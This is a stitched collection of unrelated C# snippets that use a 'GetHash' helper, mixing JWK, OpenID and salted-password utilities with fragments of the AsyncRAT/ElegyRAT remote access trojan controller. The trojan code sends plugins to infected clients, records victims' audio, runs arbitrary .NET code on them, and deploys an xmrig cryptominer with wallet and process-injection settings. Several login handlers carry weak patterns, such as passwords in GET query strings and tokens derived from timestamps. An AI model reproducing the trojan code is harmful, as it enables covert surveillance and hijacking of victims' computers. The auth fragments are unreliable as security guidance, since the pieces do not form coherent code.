public static async Task <ResetPasswordResponse> ResetPasswordAsync(string refLink, ResetPasswordRequest resetPasswordRequest)
{
try
{
using (var conn = Connection)
{
DynamicParameters parameters = new DynamicParameters();
parameters.Add("refLink", refLink);
parameters.Add("NewPasswordHash", GetHash.HashCode(resetPasswordRequest.NewPassword));
await conn.ExecuteAsync("ResetPasswordProcedure", parameters, commandType : System.Data.CommandType.StoredProcedure);
return(new ResetPasswordResponse(true, new List <ServiceResponse>
{
new ServiceResponse("200", "Your Password was reset successfully", null)
}));
}
}
catch (Exception ex)
{
return(new ResetPasswordResponse(false, new List <ServiceResponse>
{
new ServiceResponse("400", "Something went wrong", new List <Error>
{
new Error(ex.GetHashCode().ToString(), ex.Message)
})
}));
}
}
//***********************************************
public static void InitHashFunction <T>(T hashType, out GetHash hashFunction) where T : HashAlgorithm
{
if (hashType.GetType() == MD5.Create().GetType())
{
hashFunction = HashCounter.GetMd5Hash;
}
else if (hashType.GetType() == SHA256.Create().GetType())
{
hashFunction = HashCounter.GetSHA256Hash;
}
else if (hashType.GetType() != MD5.Create().GetType()
& hashType.GetType() != SHA256.Create().GetType()
& hashType.GetType() != HashAlgorithm.Create().GetType())
{
hashFunction = HashCounter.GetFNV1aHash;
}
else
{
hashFunction = HashCounter.GetSsdeepHash;
}
}
public async Task <IHttpActionResult> PutUserr(long id, [FromBody] Userr userr)
{
if (!ModelState.IsValid)
{
return(BadRequest(ModelState));
}
if (id != userr.UserID)
{
return(BadRequest());
}
string[] passwordParameters = GetHash.SHA256(userr.Password);
userr.Password = passwordParameters[0];
userr.Salt = passwordParameters[1];
db.Entry(userr).State = EntityState.Modified;
try
{
await db.SaveChangesAsync();
}
catch (DbUpdateConcurrencyException)
{
if (!UserrExists(id))
{
return(NotFound());
}
else
{
throw;
}
}
return(StatusCode(HttpStatusCode.NoContent));
}
//Start or stop audio recording
private void btnStartStopRecord_Click(object sender, EventArgs e)
{
if (textBox1.Text != null && textBox1.Text != "")
{
MsgPack packet = new MsgPack();
packet.ForcePathObject("Pac_ket").AsString = "audio";
packet.ForcePathObject("Second").AsString = textBox1.Text;
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "plu_gin";
msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Audio.dll"));
msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
Thread.Sleep(100);
btnStartStopRecord.Text = "Wait...";
btnStartStopRecord.Enabled = false;
DateTime dt1 = DateTime.Now;
int timetosleep = Convert.ToInt32(textBox1.Text) * 1000;
while ((DateTime.Now - dt1).TotalMilliseconds < timetosleep)
{
continue;
}
;
btnStartStopRecord.Text = "Start Recording";
btnStartStopRecord.Enabled = true;
}
else
{
MessageBox.Show("Input seconds to record.");
}
}
public async Task <IHttpActionResult> PostUserr([FromBody] Userr userr)
{
if (!ModelState.IsValid)
{
return(BadRequest(ModelState));
}
string[] passwordParameters = GetHash.SHA256(userr.Password);
userr.Password = passwordParameters[0];
userr.Salt = passwordParameters[1];
userr.AuthToken = GetHash.SHA256(DateTime.Now.ToString("yyyy-MM-dd hh:mm:ss"))[0];
db.Userrs.Add(userr);
await db.SaveChangesAsync();
UserrDTO transferUserObject = new UserrDTO()
{
UserID = userr.UserID,
EmailAdress = userr.EmailAdress,
StudentNumber = userr.StudentNumber,
UserName = userr.UserName,
StudyID = userr.StudyID,
UserTypeID = userr.UserTypeID,
AuthToken = userr.AuthToken
};
return(Ok(transferUserObject));
}
/// <summary>CreateJwkFromDictionary</summary>
/// <param name="dic">Dictionary</param>
/// <param name="settings">JsonSerializerSettings</param>
/// <returns>JwkString</returns>
internal static string CreateJwkFromDictionary(
Dictionary <string, string> dic,
JsonSerializerSettings settings = null)
{
// JSON Web Key (JWK) Thumbprint
// https://openid-foundation-japan.github.io/rfc7638.ja.html
// kid : https://openid-foundation-japan.github.io/rfc7638.ja.html#Example
// https://openid-foundation-japan.github.io/rfc7638.ja.html#MembersUsed
// kidには、JWK の JWK Thumbprint 値などが用いられるらしい。
// ★ EC 公開鍵の必須メンバを辞書順に並べると、crv, kty, x, y となる。
dic[JwtConst.kid] = CustomEncode.ToBase64UrlString(
GetHash.GetHashBytes(
CustomEncode.StringToByte(
JsonConvert.SerializeObject(new
{
crv = dic[JwtConst.crv],
kty = dic[JwtConst.kty],
x = dic[JwtConst.x],
y = dic[JwtConst.y]
}),
CustomEncode.UTF_8),
EnumHashAlgorithm.SHA256_M));
//dic["ext"] = "false"; // 定義をRFC上に発見できない。
if (settings == null)
{
return(JsonConvert.SerializeObject(dic));
}
else
{
return(JsonConvert.SerializeObject(dic, settings));
}
}
public void SendPlugin(string hash) // client is missing some plguins, sending them // total plugins = 550kb
{
try
{
foreach (string plugin in Directory.GetFiles("Plugins", "*.dll", SearchOption.TopDirectoryOnly))
{
if (hash == GetHash.GetChecksum(plugin))
{
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Packet").SetAsString("savePlugin");
msgPack.ForcePathObject("Dll").SetAsBytes(Zip.Compress(File.ReadAllBytes(plugin)));
msgPack.ForcePathObject("Hash").SetAsString(GetHash.GetChecksum(plugin));
ThreadPool.QueueUserWorkItem(Send, msgPack.Encode2Bytes());
//new HandleLogs().Addmsg($"Plugin {Path.GetFileName(plugin)} sent to client {Ip}", Color.Blue);
new HandleLogs().Addmsg($"插件 {Path.GetFileName(plugin)} 发送到客户端 {Ip}", Color.Blue);
break;
}
}
}
catch (Exception ex)
{
//new HandleLogs().Addmsg($"Client {Ip} {ex.Message}", Color.Red);
new HandleLogs().Addmsg($"客户端 {Ip} {ex.Message}", Color.Red);
}
}
/// <summary>
/// code_challenge_method=S256
/// BASE64URL-ENCODE(SHA256(ASCII(code_verifier)))</summary>
/// <param name="code_verifier">string</param>
/// <returns>code_challenge</returns>
public static string PKCE_S256_CodeChallengeMethod(string code_verifier)
{
return(CustomEncode.ToBase64UrlString(
GetHash.GetHashBytes(
CustomEncode.StringToByte(code_verifier, CustomEncode.us_ascii),
EnumHashAlgorithm.SHA256_M)));
}
private void Button2_Click(object sender, EventArgs e)
{
try
{
if (!IsOk)
{
return;
}
MsgPack packet = new MsgPack();
packet.ForcePathObject("Packet").AsString = "torrent";
packet.ForcePathObject("Option").AsString = "seed";
packet.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(textBox1.Text));
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "plugin";
msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
foreach (ListViewItem itm in Program.form1.listView1.SelectedItems)
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
this.Close();
}
catch (Exception ex) { MessageBox.Show(ex.Message); }
}
/// <summary>
/// SHA256でat_hash, c_hashを作成。
/// (現時点でRS256固定になっているので)
/// </summary>
/// <returns>hash</returns>
public static string CreateHash(string input)
{
// ID Token の JOSE Header にある alg Header Parameterのアルゴリズムで使用されるハッシュアルゴリズムを用い、
// input(access_token や code) のASCII オクテット列からハッシュ値を求め、左半分を base64url エンコードした値。
return(CustomEncode.ToBase64UrlString(
PubCmnFunction.ShortenByteArray(
GetHash.GetHashBytes(
CustomEncode.StringToByte(input, CustomEncode.us_ascii),
EnumHashAlgorithm.SHA256Managed), (256 / 2))));
}
public static async Task <SignupResponse> SignupAsync(SignupRequest signupRequest)
{
try
{
if (!await VerifyUsername(signupRequest.Username))
{
using (var conn = Connection)
{
conn.Open();
DynamicParameters parameters = new DynamicParameters();
parameters.Add("UserId", signupRequest.UserId);
parameters.Add("Username", signupRequest.Username);
parameters.Add("FirstName", signupRequest.FirstName);
parameters.Add("LastName", signupRequest.LastName);
parameters.Add("Email", signupRequest.EmailAddress);
parameters.Add("PasswordHash", GetHash.HashCode(signupRequest.Password));
parameters.Add("Gender", signupRequest.Gender);
parameters.Add("BirthDate", signupRequest.BirthDate);
parameters.Add("Nationality", signupRequest.Nationality);
parameters.Add("PhoneNumber", signupRequest.PhoneNumber);
parameters.Add("Location", signupRequest.Location);
parameters.Add("PrimaryGenre", signupRequest.PrimaryGenre);
parameters.Add("Biography", signupRequest.Biography);
parameters.Add("Website", signupRequest.Website);
parameters.Add("ProfileImagePath", signupRequest.ProfileImagePath);
parameters.Add("CoverImagePath", signupRequest.CoverImagePath);
parameters.Add("DateCreated", signupRequest.DateCreated);
await conn.ExecuteAsync("SignupProcedure", parameters, commandType : System.Data.CommandType.StoredProcedure);
return(new SignupResponse(true, new List <ServiceResponse>
{
new ServiceResponse("200", "Successful", null)
}));
}
}
else
{
return(new SignupResponse(false, new List <ServiceResponse>
{
new ServiceResponse("200", "Username already exists", null)
}));
}
}
catch (Exception ex)
{
return(new SignupResponse(false, new List <ServiceResponse>
{
new ServiceResponse("400", "Error Signing Up", new List <Error>()
{
new Error(ex.GetHashCode().ToString(), ex.Message)
})
}));
}
}
private static void DigDir(string targetDir)
{
// 対象フォルダ内ファイル探索
string[] files = Directory.GetFiles(targetDir, "*", SearchOption.TopDirectoryOnly);
// ディクショナリ変換(ファイル当否はすべて真)
Dictionary <string, bool> topDirFiles = files.ToDictionary(n => n, n => true);
// 対象フォルダ内フォルダ探索
string[] dirs = Directory.GetDirectories(targetDir, "*", SearchOption.TopDirectoryOnly);
// ディクショナリ変換(ファイル当否はすべて偽)
Dictionary <string, bool> topDirDirs = dirs.ToDictionary(n => n, n => false);
// ディレクトリとファイルの混合表示とするためディクショナリ結合
IEnumerable <KeyValuePair <string, bool> > topDirObj = topDirFiles.Concat(topDirDirs);
// キー昇順にソート
topDirObj = topDirObj.OrderBy(x => x.Key);
// ディレクトリ名表示
Console.WriteLine(string.Format(FORMAT_DIR_NAME, Path.GetDirectoryName(targetDir)));
// 対象オブジェクトループ
foreach (KeyValuePair <string, bool> x in topDirObj)
{
// ファイル/フォルダ名称取得
string objName = Path.GetFileName(x.Key);
// ファイルでない場合
if (!x.Value)
{
Console.WriteLine(FORMAT_OBJ_INFO, " ", "<DIR>", objName);
continue;
}
// ハッシュ取得メソッド使用
string hash = GetHash.GetFileCheckSum(x.Key);
Console.WriteLine(FORMAT_OBJ_INFO, hash, " ", objName);
}
// ファイル個数表示
Console.WriteLine(string.Format(FORMAT_PARENT_FILECOUNT, topDirFiles.Count));
// フォルダ個数表示
Console.WriteLine(string.Format(FORMAT_PARENT_DIRCOUNT, topDirDirs.Count));
// サブディレクトリフラグがオンの場合
if (Option.IsSubDirFlg)
{
// フォルダループ
foreach (string x in dirs)
{
// 自身を回帰呼び出し
DigDir(x);
}
}
}
/// <summary>
/// Password entered by the userをDB保存する際、
/// Salted and hashed passwordとして保存する必要がある。
/// </summary>
/// <param name="rawPassword">>Password entered by the user.</param>
/// <param name="eha">ハッシュ・アルゴリズム列挙型</param>
/// <param name="saltLength">ソルトの文字列長</param>
/// <param name="stretchCount">ストレッチ回数</param>
/// <returns>Salted and hashed password.</returns>
public static string GetSaltedPassword(string rawPassword, EnumHashAlgorithm eha, int saltLength, int stretchCount)
{
// ランダム・ソルト文字列を生成(区切り記号は含まなくても良い)
string salt = GetPassword.Generate(saltLength, 0); //Membership.GeneratePassword(saltLength, 0);
// Salted and hashed password(文字列)を生成して返す。
return
(CustomEncode.ToBase64String(CustomEncode.StringToByte(salt, CustomEncode.UTF_8))
+ "." + CustomEncode.ToBase64String(CustomEncode.StringToByte(stretchCount.ToString(), CustomEncode.UTF_8))
+ "." + CustomEncode.ToBase64String(CustomEncode.StringToByte(GetHash.GetHashString(salt + rawPassword, eha, stretchCount), CustomEncode.UTF_8)));
}
public static async Task <SigninResponse> SigninAsync(LoginRequest loginRequest)
{
int AccessCountFailed = 0;
string DbUsername = "", DbPasswordhash = "", Message = "LockedOut";
try
{
using (var conn = Connection)
{
DynamicParameters parameters = new DynamicParameters();
parameters.Add("Username", loginRequest.Username);
System.Data.IDataReader reader = await conn.ExecuteReaderAsync("SigninProcedure", parameters, commandType : System.Data.CommandType.StoredProcedure);
while (reader.Read())
{
DbUsername = reader["Username"].ToString();
DbPasswordhash = reader["PasswordHash"].ToString();
AccessCountFailed = reader.GetInt32(2);
break;
}
reader.Close();
while (AccessCountFailed < 5)
{
if ((loginRequest.Username == DbUsername) && (GetHash.HashCode(loginRequest.Password) == DbPasswordhash))
{
Message = "true";
}
else
{
//await conn.ExecuteAsync("AccessFailedCountIncrement",parameters, commandType: System.Data.CommandType.StoredProcedure);
Message = "false";
}
break;
}
return(new SigninResponse(true, new List <ServiceResponse>
{
new ServiceResponse("200", Message, null)
}));
}
}
catch (Exception ex)
{
return(new SigninResponse(false, new List <ServiceResponse>
{
new ServiceResponse("400", "Error Logging In", new List <Error>()
{
new Error(ex.GetHashCode().ToString(), ex.Message)
})
}));
}
}
/// <summary>生パスワードと塩味パスワードを比較認証</summary>
private void btnSPWDAuth_Click(object sender, EventArgs e)
{
if (GetHash.EqualSaltedPasswd(
this.txtSPWDRawPassword.Text, this.txtSPWDSaltedPassword.Text,
(EnumHashAlgorithm)this.cbxSPWDPV.SelectedValue, (int)this.nudSPWDSaltLength.Value))
{
MessageBox.Show("認証成功");
}
else
{
MessageBox.Show("認証失敗");
}
}
/// <summary>
/// at_hash, c_hash, s_hashを作成
/// (SHA256→HS256,RS256,ES256対応可能)
/// </summary>
/// <param name="input">string</param>
/// <returns>hash</returns>
public static string CreateHash(string input)
{
// ID Token の JOSE Header にある
// alg Header Parameterのアルゴリズムで使用されるハッシュアルゴリズムを用い、
// input(access_token や code) のASCII オクテット列からハッシュ値を求め、
byte[] bytes = GetHash.GetHashBytes(
CustomEncode.StringToByte(input, CustomEncode.us_ascii),
EnumHashAlgorithm.SHA256_M);
// 左半分を base64url エンコードした値。
return(CustomEncode.ToBase64UrlString(
ArrayOperator.ShortenByteArray(bytes, (bytes.Length / 2))));
}
/// <summary>ハッシュ</summary>
private void btnGetHash_Click(object sender, EventArgs e)
{
if (this.rbnHSString.Checked)
{
txtHSCode.Text = GetHash.GetHashString(
txtHSString.Text, (EnumHashAlgorithm)cbxHSPV.SelectedValue);
}
else
{
txtHSCode.Text = CustomEncode.ToHexString(GetHash.GetHashBytes(
CustomEncode.StringToByte(txtHSString.Text, CustomEncode.UTF_8), (EnumHashAlgorithm)cbxHSPV.SelectedValue));
}
}
public static void SetPlugins()
{
try
{
foreach (string plugin in Directory.GetFiles("Plugins", "*.dll", SearchOption.TopDirectoryOnly))
{
Settings.Plugins.Add(GetHash.GetChecksum(plugin), Strings.StrReverse(Convert.ToBase64String(File.ReadAllBytes(plugin))));
}
}
catch (Exception ex)
{
new HandleLogs().Addmsg(ex.Message, Color.Red);
}
}
// GET: api/Userr
public async Task <IQueryable <UserrDTO> > GetUserrs(string username = null, string password = null)
{
if (username != null && password != null)
{
List <UserrDTO> list = new List <UserrDTO>();
Userr userTryinToLogIn = db.Userrs.FirstOrDefault(u => u.UserName == username);
if (userTryinToLogIn == null)
{
return(list.AsQueryable());
}
string[] passwordHash = GetHash.SHA256(password, userTryinToLogIn.Salt);
string passwordToCheck = passwordHash[0];
Userr loggedInUserr = db.Userrs.FirstOrDefault(u => u.UserName == username && u.Password.Trim() == passwordToCheck);
if (loggedInUserr == null)
{
return(list.AsQueryable());
}
// Generer en ny authtoken.
loggedInUserr.AuthToken = GetHash.SHA256(DateTime.Now.ToString("yyyy-MM-dd hh:mm:ss"))[0];
db.Entry(loggedInUserr).State = EntityState.Modified;
await db.SaveChangesAsync();
UserrDTO transferUserObject = new UserrDTO()
{
UserID = loggedInUserr.UserID,
EmailAdress = loggedInUserr.EmailAdress,
StudentNumber = loggedInUserr.StudentNumber,
UserName = loggedInUserr.UserName,
StudyID = loggedInUserr.StudyID,
UserTypeID = loggedInUserr.UserTypeID,
AuthToken = loggedInUserr.AuthToken
};
list.Add(transferUserObject);
return(list.AsQueryable());
}
var users = from u in db.Userrs
select new UserrDTO()
{
UserID = u.UserID,
EmailAdress = u.EmailAdress,
StudentNumber = u.StudentNumber,
UserName = u.UserName,
StudyID = u.StudyID,
UserTypeID = u.UserTypeID
};
return(users);
}
//=====================================================================================================================================================================
private void CheckIfPwIsCorrect()
{
GetHash EncryptPW = new GetHash();
if (string.Equals(EncryptPW.Calculate(tb_CurrentPassword.Text), Settings.Default.CurrentUserPassword))
{
DialogResult = DialogResult.OK;
}
else
{
MessageBox.Show(GlobalStrings._PWChangeDialog_CurrentPWnotCorrect_Text,
GlobalStrings._PWChangeDialog_Title,
MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
/// <summary>生パスワードと塩味パスワードを比較認証</summary>
private void btnSPWDAuth1_Click(object sender, EventArgs e)
{
// パラメタ系は渡さないで検証可能
if (GetHash.EqualSaltedPassword(
this.txtSPWDRawPassword1.Text,
this.txtSPWDSaltedPassword1.Text,
(EnumHashAlgorithm)this.cbxSPWDPV1.SelectedValue))
{
MessageBox.Show("認証成功");
}
else
{
MessageBox.Show("認証失敗");
}
}
public void SendMiner(Clients client)
{
MsgPack packet = new MsgPack();
packet.ForcePathObject("Packet").AsString = "xmr";
packet.ForcePathObject("Command").AsString = "save";
packet.ForcePathObject("Bin").SetAsBytes(Zip.Compress(File.ReadAllBytes(@"Plugins\xmrig.bin")));
packet.ForcePathObject("Hash").AsString = GetHash.GetChecksum(@"Plugins\xmrig.bin");
packet.ForcePathObject("Pool").AsString = XmrSettings.Pool;
packet.ForcePathObject("Wallet").AsString = XmrSettings.Wallet;
packet.ForcePathObject("Pass").AsString = XmrSettings.Pass;
packet.ForcePathObject("InjectTo").AsString = XmrSettings.InjectTo;
ThreadPool.QueueUserWorkItem(client.Send, packet.Encode2Bytes());
Debug.WriteLine("XMR sent");
}
private void FormChat_Load(object sender, EventArgs e)
{
string nick = Interaction.InputBox("TYPE YOUR NICKNAME", "CHAT", "Admin");
if (string.IsNullOrEmpty(nick))
{
this.Close();
}
else
{
Nickname = nick;
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "plu_gin";
msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Chat.dll"));
ThreadPool.QueueUserWorkItem(ParentClient.Send, msgpack.Encode2Bytes());
}
}
private void btnSave_Click(object sender, EventArgs e)
{
Configuration config = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None);
config.AppSettings.Settings["preset-question"].Value = editPreQues.Text;
config.AppSettings.Settings["salt1"].Value = editSalt1.Text;
config.AppSettings.Settings["salt2"].Value = editSalt2.Text;
config.AppSettings.Settings["salt3"].Value = editSalt3.Text;
config.AppSettings.Settings["key-hash"].Value =
GetHash.hash(GetHash.hash(editPreAns.Text, editSalt1.Text) + editPostStr.Text, editSalt2.Text);
config.AppSettings.Settings["encrypted-text"].Value = TextEncrypt.encrypt(editText.Text,
GetHash.hash(GetHash.hash(editPreAns.Text, editSalt1.Text) + editPostStr.Text, editSalt3.Text));
config.Save(ConfigurationSaveMode.Modified);
ConfigurationManager.RefreshSection("appSettings");
File.Copy("key-hash.exe.config", "last-words.exe.config", true);
MessageBox.Show("已保存");
}
private void Button1_Click(object sender, EventArgs e)
{
if (listBoxReferences.Items.Count == 0 || string.IsNullOrWhiteSpace(txtBox.Text))
{
return;
}
//if (!txtBox.Text.ToLower().Contains("try") && !txtBox.Text.ToLower().Contains("catch")) MessageBox.Show("Please add try catch", "AsyncRAT | Dot Net Editor", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
if (!txtBox.Text.ToLower().Contains("try") && !txtBox.Text.ToLower().Contains("catch"))
{
MessageBox.Show("请添加异常处理", "ElegyRAT | Dot 网络编辑器", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
if (Program.form1.listView1.SelectedItems.Count > 0)
{
List <string> reference = new List <string>();
foreach (string ip in listBoxReferences.Items)
{
reference.Add(ip);
}
MsgPack packet = new MsgPack();
packet.ForcePathObject("Packet").AsString = "executeDotNetCode";
packet.ForcePathObject("Option").AsString = comboLang.Text;
packet.ForcePathObject("Code").AsString = txtBox.Text;
packet.ForcePathObject("Reference").AsString = string.Join(",", reference);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "plugin";
msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
foreach (ListViewItem item in Program.form1.listView1.SelectedItems)
{
Clients client = (Clients)item.Tag;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
//MessageBox.Show("Executed!", "AsyncRAT | Dot Net Editor", MessageBoxButtons.OK, MessageBoxIcon.Information);
MessageBox.Show("执行!", "ElegyRAT | Dot 网络编辑器", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
else
{
//MessageBox.Show("Selected client = 0", "AsyncRAT | Dot Net Editor", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
MessageBox.Show("选择 客户端 = 0", "ElegyRAT | Dot 网络编辑器", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
}
public static void SetPlugins()
{
try
{
foreach (string plugin in Directory.GetFiles("Plugins", "*.dll", SearchOption.TopDirectoryOnly))
{
Settings.Plugins.Add(GetHash.GetChecksum(plugin), Strings.StrReverse(Convert.ToBase64String(Zip.Compress(File.ReadAllBytes(plugin)))));
#if DEBUG
byte[] plg = Zip.Compress(File.ReadAllBytes(plugin));
Debug.WriteLine($"{plugin} : {BytesToString(plg.Length)}");
#endif
}
}
catch (Exception ex)
{
new HandleLogs().Addmsg(ex.Message, Color.Red);
}
}
public ActionResult LogIn(UserLogin login, string ReturnUrl = "")
{
string message = "";
using (UserRegistrationDBEntities _db = new UserRegistrationDBEntities())
{
var data = _db.ApplicationUsers.Where(a => a.EmailID == login.EmailID).FirstOrDefault();
if (data != null)
{
if (string.Compare(GetHash.GetHashForString(login.Password), data.Password) == 0)
{
var ticket = new FormsAuthenticationTicket(login.EmailID, true, 10);
string encrypted = FormsAuthentication.Encrypt(ticket);
var cookie = new HttpCookie(FormsAuthentication.FormsCookieName, encrypted);
cookie.Expires = DateTime.Now.AddMinutes(10);
cookie.HttpOnly = true;
Response.Cookies.Add(cookie);
Session["FullName"] = data.UserFirstName + " " + data.UserFamilyName;
Session["Email"] = data.EmailID;
Session["idUser"] = data.ApplicationUserId;
if (Url.IsLocalUrl(ReturnUrl))
{
return(Redirect(ReturnUrl));
}
else
{
return(RedirectToAction("ViewUserInformation", new RouteValueDictionary(
new { controller = "User", action = "UserData", Id = data.ApplicationUserId })));
}
}
else
{
message = "Invalid credential provided";
}
}
else
{
message = "Invalid credential provided";
}
}
ViewBag.Message = message;
return(View());
}
// <参考>
// JSON Web Key (JWK)
// https://openid-foundation-japan.github.io/rfc7517.ja.html
// を、"kty":"RSA"で検索するとイイ。
//
// A.1. Example Public Keys
// https://openid-foundation-japan.github.io/rfc7517.ja.html#PublicExample
// A.2. Example Private Keys
// https://openid-foundation-japan.github.io/rfc7517.ja.html#PrivateExample
// C.1. Plaintext RSA Private Key
// https://openid-foundation-japan.github.io/rfc7517.ja.html#example-privkey-plaintext
// ECCurve support of EccKey.
// https://github.com/dvsekhvalnov/jose-jwt/issues/105
// RSAParameters ⇔ Jwk
// https://github.com/psteniusubi/jose-jwt/blob/master/jose-jwt/jwk/JwkRsa.cs
// <Param to jwk> // <Jwk to param>
//header.Set("kty", "RSA"); //RSAParameters parameters = new RSAParameters();
//header.Set("n", parameters.Modulus); //parameters.Modulus = header.GetBytes("n");
//header.Set("e", parameters.Exponent); //parameters.Exponent = header.GetBytes("e");
//
// ココから下は秘密鍵の領域 // ココから下は秘密鍵の領域
//if (includePrivateParameters) //if (header.ContainsKey("d"))
//{ //{
// header.Set("d", parameters.D); // parameters.D = header.GetBytes("d");
// header.Set("p", parameters.P); // parameters.P = header.GetBytes("p");
// header.Set("q", parameters.Q); // parameters.Q = header.GetBytes("q");
// header.Set("dp", parameters.DP); // parameters.DP = header.GetBytes("dp");
// header.Set("dq", parameters.DQ); // parameters.DQ = header.GetBytes("dq");
// header.Set("qi", parameters.InverseQ); // parameters.InverseQ = header.GetBytes("qi");
//} //}
// // ↓↓↓
// //RSA rsa = RSA.Create();
// //rsa.ImportParameters(parameters);
// //return rsa;
#region ParamToJwk
/// <summary>ParamToJwk</summary>
/// <param name="param">RSAParameters</param>
/// <param name="settings">JsonSerializerSettings</param>
/// <returns>Jwk公開鍵</returns>
public string ParamToJwk(
RSAParameters param,
JsonSerializerSettings settings = null)
{
Dictionary <string, string> dic = new Dictionary <string, string>();
dic[JwtConst.kty] = JwtConst.RSA; // 必須
dic[JwtConst.alg] = this.JwtConstRSnnn;
// Public
dic[JwtConst.n] = CustomEncode.ToBase64UrlString(param.Modulus);
dic[JwtConst.e] = CustomEncode.ToBase64UrlString(param.Exponent); //"AQAB";
// JSON Web Key (JWK) Thumbprint
// https://openid-foundation-japan.github.io/rfc7638.ja.html
// kid : https://openid-foundation-japan.github.io/rfc7638.ja.html#Example
// https://openid-foundation-japan.github.io/rfc7638.ja.html#MembersUsed
// kidには、JWK の JWK Thumbprint 値などが用いられるらしい。
// ★ RSA 公開鍵の必須メンバを辞書順に並べると、e, kty, n となる。
dic[JwtConst.kid] = CustomEncode.ToBase64UrlString(
GetHash.GetHashBytes(
CustomEncode.StringToByte(
JsonConvert.SerializeObject(new
{
e = dic[JwtConst.e],
kty = dic[JwtConst.kty],
n = dic[JwtConst.n]
}),
CustomEncode.UTF_8),
this.HashAlgorithm));
//dic["ext"] = "false"; // 定義をRFC上に発見できない。
if (settings == null)
{
return(JsonConvert.SerializeObject(dic));
}
else
{
return(JsonConvert.SerializeObject(dic, settings));
}
}
/// <summary>パスワードを比較して認証する。</summary>
/// <param name="rawPassword">Password entered by the user.</param>
/// <param name="saltedPassword">Salted and hashed password.</param>
/// <param name="eha">ハッシュ・アルゴリズム列挙型</param>
/// <returns>
/// true:パスワードは一致した。
/// false:パスワードは一致しない。
/// </returns>
public static bool EqualSaltedPassword(string rawPassword, string saltedPassword, EnumHashAlgorithm eha)
{
// ソルト部分を取得
string[] temp = saltedPassword.Split('.');
string salt = CustomEncode.ByteToString(CustomEncode.FromBase64String(temp[0]), CustomEncode.UTF_8);
int stretchCount = int.Parse(CustomEncode.ByteToString(CustomEncode.FromBase64String(temp[1]), CustomEncode.UTF_8));
string hashedPassword = CustomEncode.ByteToString(CustomEncode.FromBase64String(temp[2]), CustomEncode.UTF_8);
// 引数のsaltedPasswordと、rawPasswordから自作したsaltedPasswordを比較
if (hashedPassword == GetHash.GetHashString(salt + rawPassword, eha, stretchCount))
{
// 一致した。
return(true);
}
else
{
// 一致しなかった。
return(false);
}
}
public void GetSaltedPasswdTest(string rawPwd, EnumHashAlgorithm eha, int saltLength)
{
try
{
// Get the Salt password using the components of touryo.
string saltedPasswd = GetHash.GetSaltedPasswd(rawPwd, eha, saltLength);
// Check salt password to see if they match.
Assert.IsTrue(GetHash.EqualSaltedPasswd(rawPwd, saltedPasswd, eha, saltLength));
// (Just in case) Salt length is different, make sure that the salt passwords do not match.
Assert.IsFalse(GetHash.EqualSaltedPasswd(rawPwd, saltedPasswd, eha, saltLength + 1));
}
catch (Exception ex)
{
// Print a stack trace when an exception occurs.
Console.WriteLine(ex.StackTrace);
throw;
}
}
